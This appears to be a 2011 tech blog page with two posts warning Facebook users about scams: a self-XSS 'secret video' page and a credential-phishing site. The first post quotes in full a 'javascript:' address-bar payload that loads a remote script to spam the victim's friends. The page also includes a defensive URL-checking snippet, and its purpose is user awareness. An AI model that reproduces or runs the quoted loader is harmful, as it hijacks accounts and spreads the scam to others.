Technology Feed Lab

technology site

Posts Tagged ‘attacker’

Fake pages spreading on Facebook pose a risk to users

Posted by TechGeek on November 11, 2011

We are observing a lot of fake pages being created on Facebook by attackers. The idea is to create a fake page and then ask the user to verify themselves by following some manual steps in order to reveal the secret video behind it. The manual steps do not reveal any secret video; instead they spread the page, with messages like “WOW Check this out it is cool”, “OMG have you seen this??” or “Check this out.. It is awesome!”, as posts on your friends’ walls. Here is how the message spreads:

[Image: fb msg]

The victim above has posted the message to all of his friends. Once you click on the link, you are taken to a Facebook page which looks like this:

[Image: page home]

The page posts a message like “warning only 18+ verify your age by following easy steps”. The attacker does this intentionally to hide the malicious activity behind it. Once you click the continue button, it displays another animation with some instructions to follow. Here is how they look:

[Image: instructions]

So when you type “J” in the address bar and press Ctrl+V, the malicious JavaScript, which is “avascript:(a=(b=document).createElement(‘script’)).src=’http://appnsnap.com/IDareYou/a.js’,b.body.appendChild(a);void(0)”, is appended to the letter J, so that the address bar now holds a complete “Javascript:” URL. This JavaScript is responsible for spreading the message to your friends’ walls.

Once you hit Enter after pasting this script in the address bar, it runs the malicious code from the “a.js” file. The code gathers all your friends and sends them a random message with a link to this malicious page. The source code of “a.js” is here. You can see the JavaScript code being used to post such messages.

Avoid visiting such pages on Facebook. Do not enter anything like JavaScript in the address bar and run it. Nothing will be revealed, and you will become a victim of such scams.

Please like our page on Facebook and spread this blog.

Posted in Facebook

Beware of Facebook phishing pages

Posted by TechGeek on September 20, 2011

Phishing is the act of tricking someone into providing confidential information such as usernames, passwords and other sensitive information. Generally, phishing is carried out via e-mail messages or on websites which claim to be a legitimate site. Attackers imitate popular social sites such as Facebook or MySpace, creating similar-looking pages on fake domains they created.

They send emails to victims asking them to log on to the site and update account information. If you don’t look closely at the domain name in the address bar, you are likely to send your sensitive personal information to the attacker. We are seeing many fake domains and pages being used to carry out phishing attacks using Facebook pages. Here is one live example:

[Image: facebook phishing]

Look at the highlighted address bar in the above image. The address differs from the real Facebook: it points to “http://www.faceworldverified.com/update/index15.php”. This is a fake site created to fool victims and steal personal information such as email and password. Once the victim enters his/her Facebook email and password, the site steals the information and sends it to a remote server under the attacker’s control. The site then immediately sends the victim to the Facebook application page “http://apps.facebook.com/videos/video.php?logged=true”.

For testing we used test@testhacker.com as the email and testhacker as the password. Once we entered this information, the page issued an HTTP GET request which sends the login information to the remote server and immediately redirects the victim to the Facebook application. Here is the GET request:

[Image: packet]

You can clearly see the email and password being sent in the above request. Remember 3 things:

1) Never click on any suspicious or unknown links sent in email.

2) Always check the domain in the address bar of your browser before entering any information.

3) Do a Google search if you come across a suspicious phishing site, and report it to Google.
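
The domain check from point 2 and the credentials-in-GET observation above can be automated over requested URLs, for example from a proxy log. This is an added example, not code from the original post; the trusted-domain list, the credential parameter names and the query strings in the sample requests are assumptions, and it is meant for URLs of pages that present themselves as Facebook.

```javascript
// Added example. Domains treated as genuine Facebook (assumption for this sketch).
const TRUSTED_DOMAINS = ["facebook.com"];
// Parameter names that suggest credentials (assumed; the capture's names are not shown).
const CREDENTIAL_KEYS = /^(e-?mail|user(name)?|login|pass(word|wd)?|pwd)$/i;

// True only for the trusted domain itself or a real subdomain of it.
function isTrustedHost(hostname) {
  const host = hostname.toLowerCase().replace(/\.$/, "");
  return TRUSTED_DOMAINS.some((d) => host === d || host.endsWith("." + d));
}

// Return the reasons a requested URL looks like credential phishing ([] if none).
function inspectUrl(rawUrl) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch (err) {
    return ["unparseable URL"];
  }
  if (isTrustedHost(url.hostname)) return [];
  const findings = ["host " + url.hostname + " is not a Facebook domain"];
  if (url.username || url.password) {
    findings.push("userinfo before @ disguises the real host");
  }
  const leaked = [...url.searchParams.keys()].filter((k) => CREDENTIAL_KEYS.test(k));
  if (leaked.length > 0) {
    findings.push("credentials in GET query: " + leaked.join(", "));
  }
  if (url.protocol !== "https:") findings.push("sent over plain HTTP");
  return findings;
}

// Constructed sample requests; only the first two hosts and paths come from the post.
const SAMPLE_REQUESTS = [
  "http://www.faceworldverified.com/update/index15.php?email=test%40testhacker.com&pass=testhacker",
  "http://apps.facebook.com/videos/video.php?logged=true",
  "http://www.facebook.com.login.example/update/",
  "http://www.facebook.com@login.example/update/",
];

for (const request of SAMPLE_REQUESTS) {
  const findings = inspectUrl(request);
  console.log(findings.length ? "SUSPICIOUS" : "ok", request, findings);
}
```

Matching on the full host suffix rather than on a substring is what catches hosts that merely contain “facebook.com” or start with “face”.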

Stay away from phishing and spread this to your friends and family. Become a fan on our Facebook page to get valuable information.


Posted in Phishing